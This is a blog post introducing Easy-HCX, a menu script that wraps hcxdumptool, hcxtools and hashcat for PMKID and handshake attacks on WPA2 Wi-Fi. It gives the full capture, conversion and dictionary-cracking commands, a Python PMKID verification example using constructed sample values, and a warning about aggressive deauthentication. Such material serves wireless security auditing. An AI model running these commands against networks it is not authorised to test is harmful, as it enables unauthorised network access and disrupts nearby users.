May 4, 2019

Easy-HCX: Making Wifi Attacks Easy

Last year a new attack on WPA2 was announced by the creators of hashcat - one that didn't require capturing the 4-way handshake, any client interaction or any kind of client even connected. With a vulnerable access point, you can try to associate with the access point, capture a PMKID packet and crack that.

This new attack uses hcxdumptool to capture and hcxtools to convert the capture file to a format hashcat can use. The process would look something like this:

hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1

hcxpcaptool -z capture.16800 -o capture.hccapx capture.pcapng (converting a pcapng to hccapx and/or 16800 formats)

hashcat -m 2500 -a 0 capture.hccapx <wordlist> (for a WPA2 handshake; the hccapx file hcxpcaptool produced)

or

hashcat -m 16800 -a 0 capture.16800 <wordlist> (for a PMKID; the 16800 file hcxpcaptool produced with -z)

By default, hcxdumptool only scans 2.4 GHz channels, so if you want it to scan both 2.4 GHz and 5 GHz networks, you'd have to type something like:

hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1 -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14,36,38,<crapton of channels>,161
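To show why a single captured PMKID is enough for an offline dictionary test (the reason no client or 4-way handshake is needed), here is an added example, not part of Easy-HCX or the hcxtools/hashcat projects, that recomputes a PMKID from a candidate passphrase and checks it against one line in the hashcat 16800 format that hcxpcaptool -z writes. The AP/station MACs, SSID and passphrase are constructed sample values, and the hashcat 16800 line layout (PMKID*MAC_AP*MAC_STA*ESSID_hex) is assumed from the format hcxpcaptool produces.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), per IEEE 802.11i.
    # This is the slow step; everything after it is a single HMAC.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    # PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA).
    # The AP sends it in the first EAPOL frame, so no client has to be on the network.
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> dict:
    # hashcat -m 16800 line (assumed layout): PMKID*MAC_AP*MAC_STA*ESSID, every field hex.
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": bytes.fromhex(ap_hex),
        "mac_sta": bytes.fromhex(sta_hex),
        "essid": bytes.fromhex(essid_hex).decode(),
    }


def pmkid_matches(line: str, passphrase: str) -> bool:
    # Recompute the PMKID for one candidate passphrase and compare with the captured value.
    rec = parse_16800(line)
    pmk = wpa2_pmk(passphrase, rec["essid"])
    calc = wpa2_pmkid(pmk, rec["mac_ap"], rec["mac_sta"])
    return hmac.compare_digest(calc, rec["pmkid"])


def make_16800_line(passphrase: str, ssid: str, mac_ap_hex: str, mac_sta_hex: str) -> str:
    # Build a constructed sample line in the same format for self-checking (not a real capture).
    pmk = wpa2_pmk(passphrase, ssid)
    pmkid = wpa2_pmkid(pmk, bytes.fromhex(mac_ap_hex), bytes.fromhex(mac_sta_hex))
    return "*".join([pmkid.hex(), mac_ap_hex, mac_sta_hex, ssid.encode().hex()])


# Constructed sample: a lab AP "LabNet" with passphrase "correct horse" and made-up MACs.
SAMPLE_LINE = make_16800_line("correct horse", "LabNet", "021122334455", "02aabbccddee")

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(pmkid_matches(SAMPLE_LINE, "correct horse"))     # True
    print(pmkid_matches(SAMPLE_LINE, "wrong passphrase"))  # False
```

The PBKDF2 step is what hashcat spends its time on; the per-candidate HMAC is cheap, which is why a long, non-dictionary passphrase is the only real mitigation on a PMKID-exposing AP.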

That got old really quick, so I wrote a script to simplify things and make them more user-friendly. The goal was not to automate everything, just to make the basic functions easier to use without having to remember or type out long commands. A menu-driven interface was easiest for me to work with, so that's what I did.

At the moment Easy-HCX only has hashcat doing dictionary attacks. I may try to incorporate other attacks in the future.

Instead of explaining everything with a wall of text, I made a demo video. Check it out:

Be very careful if you choose to enable deauthentications - hcxdumptool is quite aggressive with this and will boot off pretty much everything nearby if you aren't doing a targeted attack.

Download here